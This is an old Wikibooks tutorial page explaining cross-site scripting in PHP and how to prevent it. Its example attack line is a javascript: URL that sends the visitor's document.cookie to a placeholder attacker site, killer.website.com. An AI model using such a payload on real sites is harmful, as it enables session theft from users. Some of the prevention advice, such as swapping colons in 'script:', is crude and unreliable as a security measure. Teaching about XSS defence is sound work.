Last modified on 4 May 2009, at 03:56

PHP Programming/Cross Site Scripting

Back to PHP

ProblemEdit

Cross site scripting (or XSS) is a basic description of a script sending sensitive information (such as cookies or other session identifiers) to other websites.

Usually, these attacks affect websites that content can be edited or added to. In most cases, session identifiers or even usernames/passwords are stored inside cookies. In the case somebody knows the session identifier, they can easily use it on their machine to do any malicious tasks that you would not be happy about.

Right now, if you are logged in on wikibooks or any other websites, go to that page and type this into the address bar:

javascript:void(alert(document.cookie))

These are cookies that are sent to the website each time to identify you. Easily, if your site is not XSS proof - the cracker will write anything like this:

javascript:void(document.location('http://killer.website.com/steal_cookie.php?cookie_data='+document.cookie))

, which will send the cookie information to their website.

PreventionEdit

There are no chances to protect yourself from XSS attacks without removing malicious HTML/JavaScript code that would be submitted to another website.

As far, the most common way is to use htmlentities or htmlspecialchars to filter the coding so nobody would add any HTML to your site (e.g. blog comments):

$message = htmlentities($message);

Another way to do this is to overall create any kind of "protected mode" code, such as MediaWiki, BBCode or others that have been invented for purpose of easily styling/formatting user's content.

Another way is to replace colons in "script:" with &#58;, as well as disabling "<script".

External LinksEdit